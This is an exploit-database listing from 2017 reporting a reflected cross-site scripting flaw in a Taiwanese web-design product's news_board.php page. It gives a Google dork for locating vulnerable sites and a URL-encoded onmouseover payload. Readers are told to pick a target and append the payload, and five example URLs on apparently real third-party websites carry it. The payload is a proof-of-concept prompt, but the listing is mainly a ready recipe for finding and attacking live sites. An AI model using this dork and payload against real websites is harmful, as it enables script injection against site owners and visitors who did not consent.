網頁設計 Cross Site Scripting

Published
Credit
Risk
2017.02.04
Ashiyane Digital Security Team
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes
Dork: intext:"樂天台東民宿網" inurl:news_board.php

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|----------------------In The Name Of God------------------------|
|[+] Exploit Title: 網頁設計 Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://www.letian99.com
|[+]
|[+] Google Dork: intext:"樂天台東民宿網" inurl:news_board.php
|[+]
|[+] Tested on: Win 10 / Mozilla Firefox
|[+]
|[+] Date: 2017 04 February
|[+]
|--------------------------------------------------------------|
|[+] Exploit:
|[+] Search dork and choose a target and add "'%22%20onmouseover%3dprompt(955192)%20bad%3d%22" after URL!
|[+] To see Vulnerability!
|--------------------------------------------------------------|
|[+]
|[+] Examples :
|[+]
|[+] http://520.bnb9.com/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+] http://ttbb.yesoks.com/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+] http://t50.goodoks.com/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+] http://smokeycat.oks.tw/en/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+] http://brulee.oks.tw/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : modiret
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com